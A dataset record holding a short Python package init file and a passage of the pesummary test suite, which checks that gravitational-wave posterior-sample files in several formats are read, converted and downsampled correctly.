unsuffixed qsc_code_* columns (qsc_code_num_words through qsc_codepython_frac_lines_print, in schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0
effective: 0 | hits: 8

hexsha: 03c70810e4599743aefb894171b1cfa6fd1bfcf7 | size: 47 | ext: py | lang: Python
max_stars: old_stuff/petronia/__init__.py in groboclown/petronia (head 486338023d19cee989e92f0c5692680f1a37811f), licenses ["MIT"], max_stars_count 19, stars events 2017-06-21T10:28:24.000Z to 2021-12-31T11:49:28.000Z
max_issues: same path, repo, and head, licenses ["MIT"], max_issues_count 10, issues events 2016-11-11T18:57:57.000Z to 2021-02-01T15:33:43.000Z
max_forks: same path, repo, and head, licenses ["MIT"], max_forks_count 3, forks events 2017-09-17T03:29:35.000Z to 2019-06-03T10:43:08.000Z
content:
from . import config
from . import exceptions
| 11.75 | 24 | 0.765957 | 6 | 47 | 6 | 0.666667 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191489 | 47 | 3 | 25 | 15.666667 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ff04112471c8b43ccafe09151cd9fd564bcd8807 | 71,899 | py | Python | pesummary/tests/read_test.py | pesummary/pesummary | 99e3c450ecbcaf5a23564d329bdf6e0080f6f2a8 | ["MIT"] | 1 | 2021-08-03T05:58:20.000Z | 2021-08-03T05:58:20.000Z | pesummary/tests/read_test.py | pesummary/pesummary | 99e3c450ecbcaf5a23564d329bdf6e0080f6f2a8 | ["MIT"] | 1 | 2020-06-13T13:29:35.000Z | 2020-06-15T12:45:04.000Z | pesummary/tests/read_test.py | pesummary/pesummary | 99e3c450ecbcaf5a23564d329bdf6e0080f6f2a8 | ["MIT"] | 3 | 2021-07-08T08:31:28.000Z | 2022-03-31T14:08:58.000Z |
# Licensed under an MIT style license -- see LICENSE.md
import os
import shutil
import numpy as np
from .base import make_result_file, testing_dir
import pesummary
from pesummary.gw.file.read import read as GWRead
from pesummary.core.file.read import read as Read
from pesummary.io import read, write
import glob
__author__ = ["Charlie Hoy <charlie.hoy@ligo.org>"]
class BaseRead(object):
"""Base class to test the core functions in the Read and GWRead functions
"""
def test_parameters(self, true, pesummary=False):
"""Test the parameter property
"""
if pesummary:
assert all(i in self.result.parameters[0] for i in true)
assert all(i in true for i in self.result.parameters[0])
else:
assert all(i in self.result.parameters for i in true)
assert all(i in true for i in self.result.parameters)
def test_samples(self, true, pesummary=False):
"""Test the samples property
"""
if pesummary:
assert len(self.result.samples[0]) == 1000
assert len(self.result.samples[0][0]) == 18
samples = self.result.samples[0]
parameters = self.result.parameters[0]
else:
assert len(self.result.samples) == 1000
assert len(self.result.samples[0]) == 18
samples = self.result.samples
parameters = self.result.parameters
idxs = [self.parameters.index(i) for i in parameters]
np.testing.assert_almost_equal(
np.array(samples), np.array(self.samples)[:, idxs]
)
for ind, param in enumerate(parameters):
samp = np.array(samples).T[ind]
idx = self.parameters.index(param)
np.testing.assert_almost_equal(samp, np.array(self.samples).T[idx])
def test_samples_dict(self, true):
"""Test the samples_dict property
"""
parameters = true[0]
samples = true[1]
for num, param in enumerate(parameters):
specific_samples = [i[num] for i in samples]
drawn_samples = self.result.samples_dict[param]
np.testing.assert_almost_equal(drawn_samples, specific_samples)
def test_version(self, true=None):
"""Test the version property
"""
if true is None:
assert self.result.input_version == "No version information found"
else:
assert self.result.input_version == true
def test_extra_kwargs(self, true=None):
"""Test the extra_kwargs property
"""
if true is None:
assert self.result.extra_kwargs == {
"sampler": {"nsamples": 1000}, "meta_data": {}
}
else:
assert sorted(self.result.extra_kwargs) == sorted(true)
def test_injection_parameters(self, true, pesummary=False):
"""Test the injection_parameters property
"""
if true is None:
assert self.result.injection_parameters is None
else:
import math
assert all(i in list(true.keys()) for i in self.parameters)
assert all(i in self.parameters for i in list(true.keys()))
if not pesummary:
for i in true.keys():
if math.isnan(true[i]):
assert math.isnan(self.result.injection_parameters[i])
else:
assert true[i] == self.result.injection_parameters[i]
def test_to_dat(self):
"""Test the to_dat method
"""
self.result.to_dat(outdir=".outdir", label="label")
assert os.path.isfile(os.path.join(".outdir", "pesummary_label.dat"))
data = np.genfromtxt(
os.path.join(".outdir", "pesummary_label.dat"), names=True)
assert all(i in self.parameters for i in list(data.dtype.names))
assert all(i in list(data.dtype.names) for i in self.parameters)
for param in self.parameters:
assert np.testing.assert_almost_equal(
data[param], self.result.samples_dict[param], 8
) is None
def test_file_format_read(self, path, file_format, _class, function=Read):
"""Test that when the file_format is specified, that correct class is used
"""
result = function(path, file_format=file_format)
assert isinstance(result, _class)
def test_downsample(self):
"""Test the .downsample method. This includes testing that the
.downsample method downsamples to the specified number of samples,
that it only takes samples that are currently in the posterior
table and that it maintains concurrent samples.
"""
old_samples_dict = self.result.samples_dict
nsamples = 50
self.result.downsample(nsamples)
new_samples_dict = self.result.samples_dict
assert new_samples_dict.number_of_samples == nsamples
for param in self.parameters:
assert all(
samp in old_samples_dict[param] for samp in
new_samples_dict[param]
)
for num in range(nsamples):
samp_inds = [
old_samples_dict[param].tolist().index(
new_samples_dict[param][num]
) for param in self.parameters
]
assert len(set(samp_inds)) == 1
class GWBaseRead(BaseRead):
"""Base class to test the GWRead specific functions
"""
def test_parameters(self, true, pesummary=False):
"""Test the parameter property
"""
super(GWBaseRead, self).test_parameters(true, pesummary=pesummary)
from .base import gw_parameters
full_parameters = gw_parameters()
self.result.generate_all_posterior_samples()
assert all(i in self.result.parameters for i in full_parameters)
assert all(i in full_parameters for i in self.result.parameters)
def test_injection_parameters(self, true):
"""Test the injection_parameters property
"""
import math
super(GWBaseRead, self).test_injection_parameters(true)
self.result.add_injection_parameters_from_file(testing_dir + "/main_injection.xml", conversion=False)
true = {
'dec': [1.949725], 'geocent_time': [1186741861], 'spin_2x': [0.],
'spin_2y': [0.], 'spin_2z': [0.], 'luminosity_distance': [139.7643],
'ra': [-1.261573], 'spin_1y': [0.], 'spin_1x': [0.], 'spin_1z': [0.],
'psi': [1.75], 'phase': [0.], 'iota': [1.0471976],
'mass_1': [53.333332], 'mass_2': [26.666668],
'symmetric_mass_ratio': [0.22222222], 'a_1': float('nan'),
'a_2': float('nan'), 'tilt_1': float('nan'), 'tilt_2': float('nan'),
'phi_jl': float('nan'), 'phi_12': float('nan'),
'theta_jn': float('nan'), 'redshift': float('nan'),
'mass_1_source': float('nan'), 'mass_2_source': float('nan'),
'log_likelihood': float('nan')
}
assert all(i in list(true.keys()) for i in self.parameters)
for i in true.keys():
if not isinstance(true[i], list) and math.isnan(true[i]):
assert math.isnan(self.result.injection_parameters[i])
else:
np.testing.assert_almost_equal(
true[i], self.result.injection_parameters[i], 5
)
def test_calibration_data_in_results_file(self):
"""Test the calibration_data_in_results_file property
"""
pass
def test_add_injection_parameters_from_file(self):
"""Test the add_injection_parameters_from_file method
"""
pass
def test_add_fixed_parameters_from_config_file(self):
"""Test the add_fixed_parameters_from_config_file method
"""
pass
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
from pesummary.gw.file.standard_names import lalinference_map
self.result.to_lalinference(dat=True, outdir=".outdir",
filename="lalinference_label.dat")
assert os.path.isfile(os.path.join(".outdir", "lalinference_label.dat"))
data = np.genfromtxt(
os.path.join(".outdir", "lalinference_label.dat"), names=True)
for param in data.dtype.names:
if param not in self.result.parameters:
pesummary_param = lalinference_map[param]
else:
pesummary_param = param
assert np.testing.assert_almost_equal(
data[param], self.result.samples_dict[pesummary_param], 8
) is None
def test_file_format_read(self, path, file_format, _class):
"""Test that when the file_format is specified, that correct class is used
"""
super(GWBaseRead, self).test_file_format_read(
path, file_format, _class, function=GWRead
)
class TestCoreJsonFile(BaseRead):
"""Class to test loading in a JSON file with the core Read function
"""
def setup(self):
"""Setup the TestCoreJsonFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="json", gw=False)
self.path = os.path.join(".outdir", "test.json")
self.result = Read(self.path)
def teardown(self):
"""Remove all files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreJsonFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreJsonFile, self).test_samples(self.samples)
def test_samples_dict(self):
true = [self.parameters, self.samples]
super(TestCoreJsonFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreJsonFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreJsonFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreJsonFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreJsonFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreJsonFile, self).test_file_format_read(
self.path, "json", SingleAnalysisDefault
)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreJsonFile, self).test_downsample()
class TestCoreHDF5File(BaseRead):
"""Class to test loading in an HDF5 file with the core Read function
"""
def setup(self):
"""Setup the TestCoreHDF5File class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="hdf5", gw=False)
self.path = os.path.join(".outdir", "test.h5")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreHDF5File, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreHDF5File, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestCoreHDF5File, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreHDF5File, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreHDF5File, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreHDF5File, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreHDF5File, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreHDF5File, self).test_file_format_read(self.path, "hdf5", SingleAnalysisDefault)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreHDF5File, self).test_downsample()
class TestCoreCSVFile(BaseRead):
"""Class to test loading in a csv file with the core Read function
"""
def setup(self):
"""Setup the TestCoreCSVFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="csv", gw=False)
self.path = os.path.join(".outdir", "test.csv")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreCSVFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreCSVFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestCoreCSVFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreCSVFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreCSVFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreCSVFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreCSVFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreCSVFile, self).test_file_format_read(self.path, "csv", SingleAnalysisDefault)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreCSVFile, self).test_downsample()
class TestCoreNumpyFile(BaseRead):
"""Class to test loading in a numpy file with the core Read function
"""
def setup(self):
"""Setup the TestCoreNumpyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="npy", gw=False)
self.path = os.path.join(".outdir", "test.npy")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreNumpyFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreNumpyFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestCoreNumpyFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreNumpyFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreNumpyFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreNumpyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreNumpyFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreNumpyFile, self).test_file_format_read(self.path, "numpy", SingleAnalysisDefault)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreNumpyFile, self).test_downsample()
class TestCoreDatFile(BaseRead):
"""Class to test loading in an dat file with the core Read function
"""
def setup(self):
"""Setup the TestCoreDatFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="dat", gw=False)
self.path = os.path.join(".outdir", "test.dat")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.core.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestCoreDatFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestCoreDatFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestCoreDatFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreDatFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreDatFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreDatFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreDatFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.default import SingleAnalysisDefault
super(TestCoreDatFile, self).test_file_format_read(self.path, "dat", SingleAnalysisDefault)
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreDatFile, self).test_downsample()
class BilbyFile(BaseRead):
"""Base class to test loading in a bilby file with the core Read function
"""
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(self.result, pesummary.core.file.formats.bilby.Bilby)
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(BilbyFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(BilbyFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
true = [self.parameters, self.samples]
super(BilbyFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the bilby class
"""
true = "bilby=0.5.3:"
super(BilbyFile, self).test_version(true)
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
true = {"sampler": {
"log_bayes_factor": 0.5,
"log_noise_evidence": 0.1,
"log_evidence": 0.2,
"log_evidence_err": 0.1},
"meta_data": {'time_marginalization': True},
"other": {"likelihood": {"time_marginalization": "True"}}
}
super(BilbyFile, self).test_extra_kwargs(true)
def test_injection_parameters(self, true):
"""Test the injection_parameters property
"""
super(BilbyFile, self).test_injection_parameters(true)
def test_file_format_read(self, path, file_format):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.core.file.formats.bilby import Bilby
super(BilbyFile, self).test_file_format_read(path, file_format, Bilby)
def test_priors(self, read_function=Read):
"""Test that the priors are correctly extracted from the bilby result
file
"""
for param, prior in self.result.priors["samples"].items():
assert isinstance(prior, np.ndarray)
f = read_function(self.path, disable_prior=True)
assert not len(f.priors["samples"])
f = read_function(self.path, nsamples_for_prior=200)
params = list(f.priors["samples"].keys())
assert len(f.priors["samples"][params[0]]) == 200
class TestCoreJsonBilbyFile(BilbyFile):
"""Class to test loading in a bilby json file with the core Read function
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="json", gw=False, bilby=True)
self.path = os.path.join(".outdir", "test.json")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
super(TestCoreJsonBilbyFile, self).test_class_name()
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(TestCoreJsonBilbyFile, self).test_parameters()
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(TestCoreJsonBilbyFile, self).test_samples()
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
super(TestCoreJsonBilbyFile, self).test_samples_dict()
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreJsonBilbyFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreJsonBilbyFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: 1. for par in self.parameters}
super(TestCoreJsonBilbyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreJsonBilbyFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
super(TestCoreJsonBilbyFile, self).test_file_format_read(self.path, "bilby")
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreJsonBilbyFile, self).test_downsample()
def test_priors(self):
"""Test that the priors are correctly extracted from the bilby result
file
"""
super(TestCoreJsonBilbyFile, self).test_priors()
class TestCoreHDF5BilbyFile(BilbyFile):
"""Class to test loading in a bilby hdf5 file with the core Read function
"""
def setup(self):
"""Setup the TestCoreBilbyFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="hdf5", gw=False, bilby=True)
self.path = os.path.join(".outdir", "test.h5")
self.result = Read(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
super(TestCoreHDF5BilbyFile, self).test_class_name()
def test_parameters(self):
"""Test the parameter property of the bilby class
"""
super(TestCoreHDF5BilbyFile, self).test_parameters()
def test_samples(self):
"""Test the samples property of the bilby class
"""
super(TestCoreHDF5BilbyFile, self).test_samples()
def test_samples_dict(self):
"""Test the samples_dict property of the bilby class
"""
super(TestCoreHDF5BilbyFile, self).test_samples_dict()
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreHDF5BilbyFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreHDF5BilbyFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: 1. for par in self.parameters}
super(TestCoreHDF5BilbyFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreHDF5BilbyFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
super(TestCoreHDF5BilbyFile, self).test_file_format_read(self.path, "bilby")
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreHDF5BilbyFile, self).test_downsample()
def test_priors(self):
"""Test that the priors are correctly extracted from the bilby result
file
"""
super(TestCoreHDF5BilbyFile, self).test_priors(read_function=Read)
class PESummaryFile(BaseRead):
"""Base class to test loading in a PESummary file with the core Read function
"""
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(self.result, pesummary.core.file.formats.pesummary.PESummary)
def test_parameters(self):
"""Test the parameter property of the PESummary class
"""
super(PESummaryFile, self).test_parameters(
self.parameters, pesummary=True)
def test_samples(self):
"""Test the samples property of the PESummary class
"""
super(PESummaryFile, self).test_samples(
self.samples, pesummary=True)
def test_version(self):
"""Test the version property of the default class
"""
true = ["No version information found"]
super(PESummaryFile, self).test_version(true)
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
true = [{"sampler": {"log_evidence": 0.5}, "meta_data": {}}]
super(PESummaryFile, self).test_extra_kwargs(true)
def test_samples_dict(self):
"""Test the samples_dict property
"""
assert list(self.result.samples_dict.keys()) == ["label"]
parameters = self.parameters
samples = self.samples
for num, param in enumerate(parameters):
specific_samples = [i[num] for i in samples]
drawn_samples = self.result.samples_dict["label"][param]
np.testing.assert_almost_equal(drawn_samples, specific_samples)
def test_to_bilby(self):
"""Test the to_bilby method
"""
from pesummary.core.file.read import is_bilby_json_file
bilby_object = self.result.to_bilby(save=False)["label"]
bilby_object.save_to_file(
filename=os.path.join(".outdir", "bilby.json"))
assert is_bilby_json_file(os.path.join(".outdir", "bilby.json"))
def test_to_dat(self):
"""Test the to_dat method
"""
self.result.to_dat(
outdir=".outdir", filenames={"label": "pesummary_label.dat"}
)
assert os.path.isfile(os.path.join(".outdir", "pesummary_label.dat"))
data = np.genfromtxt(
os.path.join(".outdir", "pesummary_label.dat"), names=True)
assert all(i in self.parameters for i in list(data.dtype.names))
assert all(i in list(data.dtype.names) for i in self.parameters)
def test_downsample(self):
"""Test the .downsample method
"""
old_samples_dict = self.result.samples_dict
nsamples = 50
self.result.downsample(nsamples)
for num, label in enumerate(self.result.labels):
assert self.result.samples_dict[label].number_of_samples == nsamples
for param in self.parameters[num]:
assert all(
samp in old_samples_dict[label][param] for samp in
self.result.samples_dict[label][param]
)
for idx in range(nsamples):
samp_inds = [
old_samples_dict[label][param].tolist().index(
self.result.samples_dict[label][param][idx]
) for param in self.parameters[num]
]
assert len(set(samp_inds)) == 1
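# Illustrative sketch of the per-label bilby conversion used in test_to_bilby
# above: to_bilby(save=False) returns a dict of bilby result objects keyed by
# analysis label, each of which can be saved to disk. The metafile path, label
# and _example_to_bilby name are placeholders for illustration only.
def _example_to_bilby(metafile=".outdir/posterior_samples.h5", label="label"):
    result = Read(metafile)
    bilby_objects = result.to_bilby(save=False)
    bilby_objects[label].save_to_file(
        filename=os.path.join(".outdir", "{}_bilby.json".format(label))
    )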
class TestCoreJsonPESummaryFile(PESummaryFile):
"""Class to test loading in a PESummary json file with the core Read
function
"""
def setup(self):
"""Setup the TestCorePESummaryFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="json", gw=False, pesummary=True)
self.result = Read(os.path.join(".outdir", "test.json"))
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
super(TestCoreJsonPESummaryFile, self).test_class_name()
def test_parameters(self):
"""Test the parameter property of the PESummary class
"""
super(TestCoreJsonPESummaryFile, self).test_parameters()
def test_samples(self):
"""Test the samples property of the PESummary class
"""
super(TestCoreJsonPESummaryFile, self).test_samples()
def test_samples_dict(self):
"""Test the samples_dict property
"""
super(TestCoreJsonPESummaryFile, self).test_samples_dict()
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreJsonPESummaryFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreJsonPESummaryFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreJsonPESummaryFile, self).test_injection_parameters(
true, pesummary=True)
def test_to_bilby(self):
"""Test the to_bilby method
"""
super(TestCoreJsonPESummaryFile, self).test_to_bilby()
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreJsonPESummaryFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
pass
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreJsonPESummaryFile, self).test_downsample()
class TestCoreHDF5PESummaryFile(PESummaryFile):
"""Class to test loading in a PESummary hdf5 file with the core Read
function
"""
def setup(self):
"""Setup the TestCorePESummaryFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(
extension="hdf5", gw=False, pesummary=True)
self.result = Read(os.path.join(".outdir", "test.h5"))
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
super(TestCoreHDF5PESummaryFile, self).test_class_name()
def test_parameters(self):
"""Test the parameter property of the PESummary class
"""
super(TestCoreHDF5PESummaryFile, self).test_parameters()
def test_samples(self):
"""Test the samples property of the PESummary class
"""
super(TestCoreHDF5PESummaryFile, self).test_samples()
def test_samples_dict(self):
"""Test the samples_dict property
"""
super(TestCoreHDF5PESummaryFile, self).test_samples_dict()
def test_version(self):
"""Test the version property of the default class
"""
super(TestCoreHDF5PESummaryFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestCoreHDF5PESummaryFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestCoreHDF5PESummaryFile, self).test_injection_parameters(
true, pesummary=True)
def test_to_bilby(self):
"""Test the to_bilby method
"""
super(TestCoreHDF5PESummaryFile, self).test_to_bilby()
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestCoreHDF5PESummaryFile, self).test_to_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
pass
def test_downsample(self):
"""Test that the posterior table is correctly downsampled
"""
super(TestCoreHDF5PESummaryFile, self).test_downsample()
class TestGWCSVFile(GWBaseRead):
"""Class to test loading in a csv file with the core Read function
"""
def setup(self):
"""Setup the TestGWCSVFile class
"""
if not os.path.isdir(".outdir"):
os.mkdir(".outdir")
self.parameters, self.samples = make_result_file(extension="csv", gw=True)
self.path = os.path.join(".outdir", "test.csv")
self.result = GWRead(self.path)
def teardown(self):
"""Remove the files and directories created from this class
"""
if os.path.isdir(".outdir"):
shutil.rmtree(".outdir")
def test_class_name(self):
"""Test the class used to load in this file
"""
assert isinstance(
self.result, pesummary.gw.file.formats.default.SingleAnalysisDefault
)
def test_parameters(self):
"""Test the parameter property of the default class
"""
super(TestGWCSVFile, self).test_parameters(self.parameters)
def test_samples(self):
"""Test the samples property of the default class
"""
super(TestGWCSVFile, self).test_samples(self.samples)
def test_samples_dict(self):
"""Test the samples_dict property of the default class
"""
true = [self.parameters, self.samples]
super(TestGWCSVFile, self).test_samples_dict(true)
def test_version(self):
"""Test the version property of the default class
"""
super(TestGWCSVFile, self).test_version()
def test_extra_kwargs(self):
"""Test the extra_kwargs property of the default class
"""
super(TestGWCSVFile, self).test_extra_kwargs()
def test_injection_parameters(self):
"""Test the injection_parameters property
"""
true = {par: float("nan") for par in self.parameters}
super(TestGWCSVFile, self).test_injection_parameters(true)
def test_to_dat(self):
"""Test the to_dat method
"""
super(TestGWCSVFile, self).test_to_dat()
def test_to_lalinference_dat(self):
"""Test the to_lalinference dat=True method
"""
super(TestGWCSVFile, self).test_to_lalinference_dat()
def test_file_format_read(self):
"""Test that when the file_format is specified, that correct class is used
"""
from pesummary.gw.file.formats.default import SingleAnalysisDefault
